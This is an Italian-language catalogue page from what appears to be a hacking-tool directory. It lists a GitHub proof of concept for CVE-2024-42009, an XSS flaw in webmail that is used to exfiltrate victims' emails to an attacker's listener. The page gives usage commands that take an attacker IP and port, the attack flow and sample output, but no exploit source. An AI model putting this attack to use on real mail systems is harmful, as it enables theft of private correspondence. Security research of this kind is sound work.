Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-42009 — Questo Proof of Concept (PoC) dimostra un exploit per CVE-2024-42009, sfruttando una vulnerabilità di cross-site scripting (XSS) per estrarre email da un'applicazione webmail target. L'attacco inietta un payload dannoso che esfiltra il contenuto delle email verso un listener controllato dall'attaccante. | Kitploit
Strumenti/GitHubGitHub/bhanunamikaze/cve-2024-42009
Strumenti di PhishingRicognizioneGenerazione di PayloadExploitSfruttamento di Applicazioni WebEsfiltrazione DatiRaccolta InformazioniApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Questo Proof of Concept (PoC) dimostra un exploit per CVE-2024-42009, sfruttando una vulnerabilità di cross-site scripting (XSS) per estrarre email da un'applicazione webmail target. L'attacco inietta un payload dannoso che esfiltra il contenuto delle email verso un listener controllato dall'attaccante.

GitHub
bhanunamikaze/cve-2024-42009

CVE-2024-42009

Vedi Repository
171 anno faNon ancora revisionato
Condividi

CVE-2024-42009 PoC: Listener di Cattura Email & Exploit XSS

Panoramica

Questa Proof of Concept (PoC) dimostra un exploit per CVE-2024-42009, sfruttando una vulnerabilità di cross-site scripting (XSS) per estrarre email da un'applicazione webmail target. L'attacco inietta un payload malevolo che esfiltra il contenuto delle email verso un listener controllato dall'attaccante.

Caratteristiche

  • Sfrutta una vulnerabilità XSS per catturare il contenuto delle email.
  • Utilizza un listener HTTP per ricevere e decodificare le email esfiltrate.
  • Automatizza l'iniezione del payload e l'esfiltrazione.

Requisiti

  • Python 3.x
  • Dipendenze richieste (installazione tramite pip):
    root@kitploit:~
    pip install requests beautifulsoup4
    

Utilizzo

Esegui lo script con gli argomenti necessari:

root@kitploit:~
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337

Parametri

Flusso dell'Attacco

  1. Avvia Listener: Lo script avvia un server HTTP per catturare le email estratte.
  2. Inietta Payload Malevolo: Il payload XSS viene inviato tramite un'email appositamente creata.
  3. Attiva l'Esecuzione: Quando la vittima apre l'email, il payload si esegue e invia il contenuto dell'email al server dell'attaccante.
  4. Cattura e Decodifica: Il contenuto dell'email estratto viene decodificato e visualizzato.

Esempio di Output

root@kitploit:~
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)

[+] Captured Email Content:
Hello, this is a test email!

Dichiarazione di non responsabilità

Non rivendico credito/proprietà/divulgazione della vulnerabilità e di tutti gli exploit corrispondenti ospitati in questo repository GitHub - Tutti i crediti al ricercatore che l'ha scoperta; ho solo creato una POC per replicare la vulnerabilità basandomi sui dati provenienti da internet. Questa PoC è solo a scopo educativo e di ricerca. Test non autorizzati su sistemi senza consenso sono illegali. Usala in modo responsabile!

Scarica lo strumento
ArgomentoDescrizione
-fu, --from-userL'indirizzo email del mittente
-tu, --to-userL'indirizzo email del destinatario
-u, --target-urlL'URL della webmail di destinazione
-ip, --server-ipL'indirizzo IP del listener dell'attaccante
-p, --server-portLa porta per il listener (default: 1337)